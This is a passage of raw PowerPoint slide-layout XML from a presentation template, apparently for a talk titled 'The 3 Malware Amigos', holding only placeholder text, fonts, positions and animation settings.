            <a:lvl9pPr marL="2286000" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to add longer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a:off x="4584700" y="426704"/>
            <a:ext cx="0" cy="5990425"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358814" y="1598903"/>
            <a:ext cx="3773223" cy="3646025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3600" b="0" i="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Gotham Rounded Light" charset="0"/>
                <a:cs typeface="Gotham Rounded Light" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add Title or Click Icon to Add Graphic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>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slide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57291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6">
            <p:tnLst>
              <p:par>
                <p:cTn presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="click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 lvl="7">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subTnLst>
                    <p:animClr clrSpc="rgb" dir="cw">
                      <p:cBhvr override="childStyle">
                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                        <p:tgtEl>
                          <p:spTgt spid="17"/>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emo (Optional)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4635500" cy="6858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latin typeface="Gotham Medium" panose="02000604030000020004" pitchFamily="50" charset="0"/>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4635500" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2054618"/>
            <a:ext cx="4629149" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Gotham Light" charset="0"/>
                <a:cs typeface="Gotham Light" charset="0"/>
              </a:rPr>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="328230"/>
            <a:ext cx="6463307" cy="5990425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="2400" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5pPr algn="l">
              <a:defRPr sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Gotham Book" panose="02000604040000020004" pitchFamily="50" charset="0"/>
                <a:ea typeface="Gotham Book" panose="02000604040000020004" pitchFamily="50" charset="0"/>
                <a:cs typeface="Gotham Book" panose="02000604040000020004" pitchFamily="50" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2286000" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent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463041" y="0"/>
            <a:ext cx="1463041" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Gotham Medium" panose="02000604030000020004" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>This bullet list is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Gotham Medium" panose="02000604030000020004" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>preset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Gotham Medium" panose="02000604030000020004" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Gotham Medium" panose="02000604030000020004" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Gotham Medium" panose="02000604030000020004" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>animations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3931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2"/>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2"/>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2"/>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2"/>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2"/>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6">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7">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8">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subTnLst>
                    <p:animClr clrSpc="rgb" dir="cw">
                      <p:cBhvr override="childStyle">
                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                        <p:tgtEl>
                          <p:spTgt spid="8"/>
                        </p:tgtEl>
                        <p:attrNameLst>
                          <p:attrName>ppt_c</p:attrName>
                        </p:attrNameLst>
                      </p:cBhvr>
                      <p:to>
                        <a:schemeClr val="tx2"/>
                      </p:to>
                    </p:animClr>
                  </p:subTnLst>
                </p:cTn>
              </p:par>
            </p:tnLst>
          </p:tmpl>
          <p:tmpl lvl="9">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FEB592BB-404A-5346-900F-B350A65F8FA3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1727068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235660B-5B7F-B645-B443-D42A037FDEA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9821008" y="0"/>
            <a:ext cx="2370992" cy="6857999"/>
            <a:chOff x="9821008" y="-7734"/>
            <a:chExt cx="2370992" cy="6857999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E825BF2-7046-F845-B3A0-2514BCAEF1E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="70000"/>
            </a:blip>
            <a:srcRect l="49299" t="1152" r="17381"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9888415" y="71054"/>
              <a:ext cx="2303585" cy="6761105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D917239-6353-5344-96C7-DF339B8138EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9821008" y="-7734"/>
              <a:ext cx="2048607" cy="6857999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="73000">
                  <a:schemeClr val="bg1"/>
                </a:gs>
                <a:gs pos="83000">
                  <a:schemeClr val="bg1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1"/>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639024" y="78789"/>
            <a:ext cx="10175514" cy="922137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600" b="0" cap="none" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="1556240"/>
            <a:ext cx="10175514" cy="4340567"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>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60070" indent="-285750">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar cha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34390" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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08710" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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383030" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835724FA-D287-F042-A50D-440303D70BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483578" y="6484294"/>
            <a:ext cx="1237839" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The 3 Malware Amigos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537F9D8-8DF5-D549-B114-5CE0E3BB477E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="861647" y="1222130"/>
            <a:ext cx="1820008" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975"/>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171E006-A448-3B45-B5EC-4DE948D9393F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="70000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771651" y="6484294"/>
            <a:ext cx="721292" cy="210944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1439949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9CA81-1647-4769-B881-EB040F84EFF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533E1D8D-5AF9-4F28-9B7D-5DC56DB45269}"/>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4F97DF-7AAF-4FCE-A8F4-CAC07F15850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1322F7D-FA65-42B4-9161-6C4BD1429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45C3A-2FE5-4296-9BB2-F8DE7417710E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6393D41B-4110-4B61-8CE8-CE846C38989A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3280399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FIR_single-tex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22036" y="990599"/>
            <a:ext cx="11371383" cy="5321300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="309003" marR="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sz="3733"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="689964" marR="0" indent="-273024" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="3200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="988386" marR="0" indent="-298419" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="2667"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1369348" marR="0" indent="-287835" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="2133"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1748191" marR="0" indent="-273024" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="309003" marR="0" lvl="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a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3733" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="689964" marR="0" lvl="1"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3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="988386" marR="0" lvl="2" indent="-298419"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667" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1369348" marR="0" lvl="3" indent="-287835"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133" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1748191" marR="0" lvl="4"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1867" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422036" y="180487"/>
            <a:ext cx="11371383" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4B4B4B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="51431" tIns="36001" rIns="51431" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11536683" y="6311900"/>
            <a:ext cx="653796" cy="546101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="51432" tIns="25715" rIns="51432" bIns="25715" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1333" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="1219080"/>
            <a:fld id="{A12C446D-6113-E749-B2D6-33109B9D4DC9}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="1219080"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27543977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FIR_two-column-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3237" y="942891"/>
            <a:ext cx="5606563" cy="5369012"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="309003" marR="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a:lvl1pPr>
            <a:lvl2pPr marL="689964" marR="0" indent="-273024" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="988386" marR="0" indent="-298419" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1369348" marR="0" indent="-287835" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1748191" marR="0" indent="-273024" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="309003" marR="0" lvl="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a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3733" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
